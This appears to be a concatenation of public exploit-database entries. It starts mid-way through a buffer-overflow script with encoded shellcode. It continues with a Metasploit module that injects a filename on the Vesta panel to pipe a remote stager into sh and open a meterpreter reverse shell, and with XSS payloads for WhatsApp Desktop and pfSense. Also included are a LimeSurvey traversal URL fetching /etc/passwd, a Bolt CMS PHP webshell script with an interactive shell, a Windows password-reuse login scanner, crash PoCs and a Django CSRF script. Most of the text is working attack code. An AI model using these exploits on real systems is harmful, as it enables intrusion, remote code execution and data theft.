+= b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a" buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54" buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f" buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b" buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62" buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50" buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46" buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38" buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d" buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70" buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52" buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43" buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f" buf += b"\x75\x4d\x30\x41\x41" nseh = "\x71\x41" seh = "\x41\x4a" alignment = "" alignment += "\x54\x71" # push ebx, padding alignment += "\x58\x71" # pop eax, padding alignment += "\x05\x20\x22" # add eax, 0x22002000 alignment += "\x71" # Padding alignment += "\x2D\x19\x22" # sub eax, 0x22001900 alignment += "\x71" # Padding alignment += "\x50\x71" # push eax, padding alignment += "\xC3" # retn buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000 f = open ("poc.m3l", "w") f.write(buffer) f.close()

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info={}) super(update_info(info, 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", 'Description' => %q{ This module exploits command injection vulnerability in v-list-user-backups bash script file. Low privileged authenticated users can execute arbitrary commands under the context of the root user. An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As result of that backup process, when an attacker try to list existing backups injected payload will be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mehmet Ince <[email protected]>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], ['CVE', '2020-10808'] ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 8083, 'WfsDelay' => 300, 'Payload' => 'python/meterpreter/reverse_tcp' }, 'Platform' => ['python'], 'Arch' => ARCH_PYTHON, 'Targets' => [[ 'Automatic', { }]], 'Privileged' => false, 'DisclosureDate' => "Mar 17 2020", 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(8083), OptString.new('USERNAME', [true, 'The username to login as']), OptString.new('PASSWORD', [true, 'The password to login with']), OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) deregister_options('FTPUSER', 'FTPPASS') end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def login # # This is very simple login process. Nothing important. # We will be using cookie and csrf_token across the module so that we are global variable. # print_status('Retrieving cookie and csrf token values') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login', '/'), }) if res && res.code == 200 && !res.get_cookies.empty? @cookie = res.get_cookies @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || '' if @csrf_token.empty? fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') end else fail_with(Failure::Unknown, 'Something went wrong.') end print_good('Cookie and CSRF token values successfully retrieved') print_status('Authenticating to HTTP Service with given credentials') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login', '/'), 'cookie' => @cookie, 'vars_post' => { 'token' => @csrf_token, 'user' => username, 'password' => password } }) if res && res.code == 302 && !res.get_cookies.empty? print_good('Successfully authenticated to the HTTP Service') @cookie = res.get_cookies else fail_with(Failure::Unknown, 'Credentials are not valid.') end end def is_scheduled_backup_running res = trigger_scheduled_backup # # MORE explaination. # if res && res.code == 302 res = trigger_payload if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') return true else print_good('It seems scheduled backup is done ..! Triggerring payload <3') return false end else fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') end return false end def trigger_payload res = send_request_cgi({ 'method' => 'GET', 'cookie' => @cookie, 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), }) if res && res.code == 200 res else fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') end end def trigger_scheduled_backup res = send_request_cgi({ 'method' => 'GET', 'cookie' => @cookie, 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), }) if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// res else fail_with(Failure::Unknown, 'Something went wrong.') end end def payload_implant # # Our payload will be placed as a file name on FTP service. # Payload lenght can't be more then 255 and SPACE can't be used because of the # bug in the backend software. Due to these limitations, I used web delivery method. # # When the initial payload executed. It will execute very short perl command, which is going to fetch # actual python meterpreter first stager and execute it. # final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" # Yet another datastore variable overriding. if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end port_restore = datastore['RPORT'] datastore['RPORT'] = 21 datastore['FTPUSER'] = username datastore['FTPPASS'] = password # # Connecting to the FTP service with same creds as web ui. # Implanting the very first stage of payload as a empty file. # if (not connect_login) fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') end print_good('Successfully authenticated to the FTP service') res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") if res.nil? fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") end print_good('Successfully uploaded the payload as a file name') disconnect # Revert datastore variables. datastore['RPORT'] = port_restore datastore['SSL'] = true if ssl_restore end def exploit start_http_server payload_implant login trigger_scheduled_backup print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') while is_scheduled_backup_running == true print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') Rex.sleep(30) end stop_service end def on_request_uri(cli, request) print_good('First stage is executed ! Sending 2nd stage of the payload') second_stage = "python -c \"#{payload.encoded}\"" send_response(cli, second_stage, {'Content-Type'=>'text/html'}) end def start_http_server # # HttpClient and HttpServer use same SSL variable :( # We don't need a SSL for payload delivery. # if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) print_status("Second payload download URI is #{get_uri}") # We need that global variable since get_uri keep using SSL from datastore # We have to get the URI before restoring the SSL. @second_stage_url = get_uri datastore['SSL'] = true if ssl_restore end end

# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting # Date: 2020-01-21 # Exploit Author: Gal Weizman # Vendor Homepage: https://www.whatsapp.com # Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe # Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg # Version: 0.3.9308 # Tested On: Mac OS, Windows, iPhone # CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 // step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) // step 2: open devtools and search in all files "t=e.id" // step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found // step 4: paste "https://example.com" in the text box and hit "Enter" // step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" var payload = `(async function() { alert(navigator.userAgent); (async function() { // read "file:///C:/windows/system32/drivers/etc/hosts" content const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); const t = await r.text(); alert(t); }()) }())`; payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; e.__x_matchedText = payload; e.__x_body = ` Innocent text ${payload} More Innocent text `; // step 6: press F8 in order for the execution to continue // result: a message should be sent to the victim that once is clicked will execute the payload above // further information: https://github.com/weizman/CVE-2019-18426

# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal # Date: 2020-04-02 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.1.11+200316 # Tested on: Ubuntu 18.04.4 # CVE : CVE-2020-11455 # Vulnerability Details # Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey # that allows an attacker to download arbitrary files. The file manager functionality will also # delete the file after it is downloaded (if the web service account has permissions to do so), # allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. Vulnerable Parameter : "path" # POC https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd

# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution # Date: 2020-04-05 # Exploit Author: r3m0t3nu11 # Vendor Homepage: https://bolt.cm/ # Software Link: https://bolt.cm/ # Version: up to date and 6.x # Tested on: Linux # CVE : not-yet-0day #!/usr/bin/python import requests import sys import warnings import re import os from bs4 import BeautifulSoup from colorama import init from termcolor import colored init() #pip install -r requirements.txt print(colored(''' ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ Pre Auth rce with low credintanl #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) if len(sys.argv) != 4: print((len(sys.argv))) print((colored("[~] Usage : ./bolt.py url username password","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] request = requests.session() print((colored("[+] Retrieving CSRF token to submit the login form","green"))) page = request.get(url+"/bolt/login") html_content = page.text soup = BeautifulSoup(html_content, 'html.parser') token = soup.findAll('input')[2].get("value") login_info = { "user_login[username]": username, "user_login[password]": password, "user_login[login]": "", "user_login[_token]": token } login_request = request.post(url+"/bolt/login", login_info) print((colored("[+] Login token is : {0}","green")).format(token)) aaa = request.get(url+"/bolt/profile") soup0 = BeautifulSoup(aaa.content, 'html.parser') token0 = soup0.findAll('input')[6].get("value") data_profile = { "user_profile[password][first]":"password", "user_profile[password][second]":"password", "user_profile[email]":"[email protected]", "user_profile[displayname]":"<?php system($_GET['test']);?>", "user_profile[save]":"", "user_profile[_token]":token0 } profile = request.post(url+'/bolt/profile',data_profile) cache_csrf = request.get(url+"/bolt/overview/showcases") soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") soup2 = BeautifulSoup(asyncc.text, 'html.parser') tables = soup2.find_all('span', class_ = 'entry disabled') print((colored("[+] SESSION INJECTION ","green"))) for all_tables in tables: f= open("session.txt","a+") f.write(all_tables.text+"\n") f.close() num_lines = sum(1 for line in open('session.txt')) renamePostData = { "namespace": "root", "parent": "/app/cache/.sessions", "oldname": all_tables.text, "newname": "../../../public/files/test{}.php".format(num_lines), "token": csrf } rename = request.post(url+"/async/folder/rename", renamePostData) try: url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) rev = requests.get(url1).text r1 = re.findall('php',rev) r2 = r1[0] if r2 == "php" : fileINJ = "test{}".format(num_lines) print((colored("[+] FOUND : "+fileINJ,"green"))) except IndexError: print((colored("[-] Not found.","red"))) new_name = 0 while new_name != 'quit': inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red")) if inputs == "quit" : exit() else: a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) aa = a.text r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) print((r11)[0])

# Title: Microsoft NET USE win10 - Insufficient Authentication Logic # Date: 2020-04-04 # Author: hyp3rlinx # Vendor: www.microsoft.com # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows "net use" Command Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. [Vulnerability Type] Insuffient Password Prompt [CVE Reference] N/A [Security Issue] The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to has other vulnerabilities present. In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation. Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less. Requirements: 1) Remote system built-in Administrator account is enabled 2) Origination system users account password and the remote system Administrator passwords match (reuse). Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue. However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails. Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections and try them and if theres password reuse (likely) BOOM automagic logon. This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used. When testing make sure to logout then log back in after changing passwords so the environment is clean. e.g. 1) Passwords for both systems are different and remote built-in Administrator account active: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator Enter the password for 'Administrator' to connect to '192.168.x.x': System error 5 has occurred. Access is denied. 2) Passwords for both origination system and remote match: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator The command completed successfully. By the way as a side note DCERPC calls work as well, if both systems happen to have same password. c:\>getmac /s x.x.x.x /U Administrator MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same." Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? Expected result: Consistent password dialog box, no matter if passwords match or not. Actual Result: No prompt for a password if both systems passwords are the same. Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. [Exploit/POC] import os,re,time,signal,sys from subprocess import * from multiprocessing import Process #By John Page (aka hyp3rlinx) #Apparition Security #twitter.com/hyp3rlinx #----------------------------------- #When a remote systems built-in Administrator account is enabled and both the remote and the target system #passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. # #MountPoints2 and Terminal server client hints in the Windows registry can help us. #Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. #REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) #MountPoints2 key entries are stored like '##10.2.1.40#c$' #----------------------------------------------------------- BANNER=""" _ ______________ ___ ____ __ _______ ______ / | / / ____/_ __/ / | / __ )/ / / / ___// ____/ / |/ / __/ / / / /| | / __ / / / /\__ \/ __/ / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___ /_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/ By Hyp3rlinx ApparitionSec """ DRIVE="X" FINDME="The command completed successfully." REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" VULN_FOUND=set() DELAY=2 #Any lower and we may get inaccurate results. rdp_server_lst=[] #Return prior network logons to remote systems. def mountpoints2(): mntpoint2_connections=[] try: p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) tmp = p.stdout.readlines() except Exception as e: print("[!] "+str(e)) return False for x in tmp: idx = x.find("##") clean = x[idx:] idx2 = clean.rfind("#") ip = clean[2:idx2] ip = re.sub(r"#.*[A-Z,a-z]","",ip) if ip not in mntpoint2_connections: mntpoint2_connections.append(ip) mntpoint2_connections = list(filter(None, mntpoint2_connections)) p.kill() return mntpoint2_connections #Terminal server client stores remote server connections. def rdp_svrs(): global rdp_server_lst try: p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) tmp = p.stdout.readlines() for key in tmp: if key.find("Servers")!=-1: pos = key.rfind("\\") srv = key[pos + 1:].replace("\r\n","").strip() rdp_server_lst.append(srv) p.kill() except Exception as e: print("[!] "+str(e)) return False return True #Disconnect def del_vuln_connection(ip): try: print("[!] Disconnecting vuln network logon connection.\n") call(r"net use "+DRIVE+":"+" /del") except Exception as e: print("[!] "+str(e)) #Check connection def chk_connection(ip): print("[+] Testing: "+ip) sys.stdout.flush() cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) stderr, stdout = cmd.communicate() if "Reply from" in stderr and "Destination host unreachable" not in stderr: print("[*] Target up!") return True else: print("[!] Target unreachable :(") return False #Test vuln def Test_Password_Reuse(ip): print("[+] Testing "+ip + " the builtin Administrator account.\n") sys.stdout.flush() try: p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) err = p.stderr.readlines() if err: e = str(err) if e.find("error 53")!=-1: print("[*] Network path not found\n") return elif e.find("error 1219")!=-1: print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") return elif e.find("error 85")!=-1: print("[*] The local device name is already in use.\n") return else: print(e+"\n") tmp = p.stdout.read() if FINDME in tmp: print("[*] Password reuse for the built-in Administrator found!") print("[+] Connected to target: "+ ip) VULN_FOUND.add(ip+":Administrator") del_vuln_connection(ip) p.kill() except Exception as e: print("[!] "+str(e)) #Authenticate def auth(ip): action_process = Process(target=Test_Password_Reuse, args=(ip,)) action_process.start() action_process.join(timeout=5) action_process.terminate() if __name__ == "__main__": print(BANNER) print("[+] Windows 'net use' Network Logon Type-3") print("[+] Insufficient Password Prompt") print("[+] By hyp3rlinx\n") time.sleep(3) print("[+] Deleting any existing network logons to start clean.") #Make sure no exist sessions already exist. call(r"net use * /del /y") sys.stdout.flush() time.sleep(1) #Grab previous connections from MountPoints2 if any. rdp_svrs() svrlst=mountpoints2() if svrlst: svrlst + rdp_server_lst else: svrlst = rdp_server_lst if not svrlst: print("[*] No MountPoints2 artifacts found, enter an IP.") sys.stdout.flush() ip=raw_input("[+] Target IP> ") if chk_connection(ip): auth(ip) else: #We have MountPoints2 or RDP Server list IP we can try. for ip in svrlst: if chk_connection(ip): auth(ip) time.sleep(DELAY) if len(VULN_FOUND) != 0: print("[*] Located the following vulnerable systems:") sys.stdout.flush() for v in VULN_FOUND: print("[+] "+v) else: print("[+] All previous attempts failed, enter an IP and give it a shot!.") sys.stdout.flush() ip=raw_input("[+] Target IP> ") if chk_connection(ip): auth(ip) [POC Video URL] https://www.youtube.com/watch?v=Je93Neb0k8g [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: February 28, 2020 MSRC "behavior you are reporting is by design" : March 30, 2020 April 5, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting # Date: 2020-04-02 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.pfsense.org # Version: PfSense 2.4.4-P3 # Tested on: FreeBSD 11.2-RELEASE-p10 # CVE : CVE-2020-11457 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. # Vulnerable Parameter : descr # POC # Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. # This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is # the id of the user containing the payload. POST /system_usermanager.php?act=new HTTP/1.1 Host: TARGET Connection: close Content-Length: 410 Cache-Control: max-age=0 Origin: https://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Referer: https://TARGET/system_usermanager.php?act=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d __csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save

# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.emtec.com # Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe # Tested Version: 7.25.5 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: # 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx" # 2.- Open ZOC Terminal # 3.- Select Script > Start REXX Script... # 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open" # 5.- Crashed cod = "\x41" * 20000 f = open('ZOC_7.25.5_Script.zrx', 'w') f.write(cod) f.close()

# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) # Date: 2020-04-06 # Exploit Author: Josue Encinar # Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 # Version: 2.79 # Tested on: Ubuntu 18.04 from subprocess import Popen, PIPE data = "" bof = False for i in range (1, 200): A = "A"*i data = f"dhcp_release {A} 1 1" try: result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True) error = result.stderr.read().decode() if "Aborted (core dumped)" in error: print("[+] Buffer Overflow detected!") print(f"[*] Offset: {i}") bof = True break except Exception as e: print(f"[-] {e}") if not bof: print("[-] No buffer overflow...") ## Check line 273 in dhcp_release.c ### strcpy(ifr.ifr_name, argv[1]); # ## PoC: # josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py # *** buffer overflow detected ***: dhcp_release terminated # [+] Buffer Overflow detected! # [*] Offset: 16

# Exploit Title: Django 3.0 - Cross-Site Request Forgery Token Bypass # Date: 2020-04-08 # Exploit Author: Spad Security Group # Vendor Homepage: https://www.djangoproject.com/ # Software Link: https://pypi.org/project/Django/ # Version: 3.0 =< # Tested on: windows 10 # Language: python3.8 # t.me/SpadSec # Spad Security Group from requests import Session import sys from bs4 import BeautifulSoup from time import sleep from colorama import Fore, Style from random import choice from os import name, system colors = [Fore.RED, Fore.BLUE, Fore.WHITE, Fore.GREEN, Fore.CYAN, Fore.YELLOW] def cleaner(): if name == "nt": system("cls") else: system("clear") def logo_printer(): cleaner() logo = r""" \_______/ `.,-'\_____/`-.,' /`..'\ _ /`.,'\ / /`.,' `.,'\ \ /__/__/ \__\__\__ \ \ \ / / / \ \,'`._,'`./ / \,'`./___\,'`./ ,'`-./_____\,-'`. / \ """ _logo_enumer = 0 for char in logo: sys.stdout.write(f"{choice(colors)}{char}{Style.RESET_ALL}") sys.stdout.flush() _logo_enumer +=1 sleep(0.005) print(f"{colors[4]}DjangoCsrfMiddlewareToken bypass by SpadSecurity Group \n{colors[3]}\tt.me/SpadSec") class DjangoCsrfMiddleWareBypass: def __init__(self, url: str, username: str, password: str): self.url = url self.username = username self.password = password logo_printer() self.cookies = {} self.session = Session() self.bypass() def spad_printer(self, string): print("\n") for char in string: sys.stdout.write(char) sys.stdout.flush() sleep(0.05) def bypass(self): global colors _conn = self.session.get(self.url) self.spad_printer(f"{colors[5]}[{colors[0]}x{colors[5]}] {colors[4]}Target: {colors[3]}{self.url}") self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Trying to bypass cookies ...") for key, value in _conn.cookies.items(): self.cookies[key] = value self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Bypassed Cookies ;)!") soup = BeautifulSoup(_conn.text, "lxml") csrf = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value'] self.spad_printer(f"{colors[5]}[{colors[0]}~{colors[5]}] {colors[1]}Csrf-Token Found{Style.RESET_ALL}") login = self.session.post(self.url, data={'csrfmiddlewaretoken': csrf, 'username': self.username, 'password': self.password}, cookies=self.cookies) if len(login.history) >= 2: if login.history[1].is_redirect: self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in") else: self.spad_printer("[-] Error") else: if login.history: if login.history[0].is_redirect: self.spad_printer(f"{colors[5]}[{colors[0]}+{colors[5]}] {colors[1]}Csrf-Token bypassed and logged in{Style.RESET_ALL}") for key, value in self.session.cookies.items(): self.spad_printer(f"{colors[5]}[{colors[0]}!{colors[5]}] {colors[4]}{key} {colors[1]}-> {colors[4]}{value}{Style.RESET_ALL}") else: self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") else: self.spad_printer(f"{colors[5]}[{colors[0]}-{colors[5]}] {colors[1]}Error") if __name__ == "__main__": try: url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] DjangoCsrfMiddleWareBypass(url, username, password) except IndexError: logo_printer() for char in f"[!] python {sys.argv[0]} http://google.com username password": sys.stdout.write(char) sys.stdout.flush() sleep(0.05)

